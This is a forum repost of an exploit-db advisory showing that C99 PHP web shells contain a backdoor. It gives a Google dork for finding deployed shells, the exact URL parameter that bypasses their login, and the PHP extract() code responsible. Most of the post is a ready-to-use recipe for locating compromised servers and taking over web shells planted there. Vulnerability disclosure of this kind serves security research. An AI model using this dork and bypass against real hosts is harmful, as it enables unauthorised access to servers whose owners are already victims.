Usr6 Posted July 11, 2014 Report Posted July 11, 2014 # Exploit Title: C99 Shell Authentication Bypass via Backdoor# Google Dork: inurl:c99.php# Date: June 23, 2014# Exploit Author: mandatory ( Matthew Bryant )# Vendor Homepage: http://ccteam.ru/# Software Link: https://www.google.com/# Version: < 1.00 beta# Tested on:Linux # CVE: N/AAll C99.php shells are backdoored. To bypass authentication add "?c99shcook[login]=0" to the URL. e.g. http://127.0.0.1/c99.php?c99shcook[login]=0The backdoor: @extract($_REQUEST["c99shcook"]);Which bypasses the authentication here:if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if ($login_txt === false) { $login_txt = ""; } elseif (empty($login_txt)) { $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html)); } header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); }}For more info: [[url]http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/[/url]~mandatorySursa: http://www.exploit-db.com/exploits/34025/ Quote